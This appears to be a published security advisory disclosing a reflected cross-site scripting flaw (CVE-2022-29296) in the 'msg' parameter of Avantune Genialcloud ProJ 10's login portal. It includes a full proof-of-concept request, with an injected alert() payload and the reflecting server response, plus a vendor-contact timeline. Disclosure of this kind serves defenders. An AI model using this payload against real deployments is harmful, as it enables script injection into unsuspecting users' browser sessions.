Avantune Genialcloud ProJ 10 Cross Site Scripting

Avantune Genialcloud ProJ version 10 suffers from a cross site scripting vulnerability.


SHA-256 | 7a0d3b9dfd4b8e8ad8e6da668090859f7b1f76c4079023524c8bc929d6e1982f

# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296


Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject
and execute arbitrary web scripts or HTML via a crafted payload.

Request parameters affected is "msg".

PoC Request:
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0

PoC Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="stylesheet"
...[SNIP]...
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>
...[SNIP]...


Timeline:

2022-01-05: Vulnerability discovered.
2022-01-06: Vendor contacted.
2022-02-07: No reply, vendor contacted for 2nd time.
2022-02-10: Request for CVE reservation.
2022-04-16: Assigned CVE number CVE-2022-29296.
2022-05-07: No reply, vendor contacted for 3rd time.
2022-06-01: Public disclosure.


PoC Screenshots:

https://imagebin.ca/v/6j86ekMqKZD8
https://postimg.cc/XXv6YbK9



Related Posts